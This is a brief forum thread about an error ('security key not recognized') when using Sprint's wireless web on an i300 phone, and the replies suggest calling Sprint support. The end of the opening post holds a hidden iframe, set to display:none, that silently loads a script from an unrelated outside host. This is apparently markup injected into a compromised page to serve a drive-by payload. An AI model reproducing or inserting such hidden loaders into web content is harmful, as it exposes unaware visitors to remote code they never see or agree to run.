    hello all,

    i just go the i300 and am having trouble using the wireless web. i've got it all setup but when i click on the 'wireless' web or the 'sprintpcs web' icons it will connect and then give a message like, "security is not enabled, it may take some time to enable. Enable now?" when i click on yes, i get this other message that says, "security key not recognized" anyone know what the problem is? thanks!<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

    Not sure what this is, but if you call Sprint, I betcha they can get you up and running in no time....

    I got that same error message when I first got my I300. Sprint needs to put you in their wireless web database as having data access or something like that. Just call Sprint tech suport, explain the situation, and they should be able to fix it right then and there.

    when you sign up to use the wireless wen, the systems ned to know who you are. spreit should have set that up for you when you signed up for it... give them a call(tech support) and let them hook you up.. they will say it will take maybe a day or so, but usually it happens in a coupole of minutes...
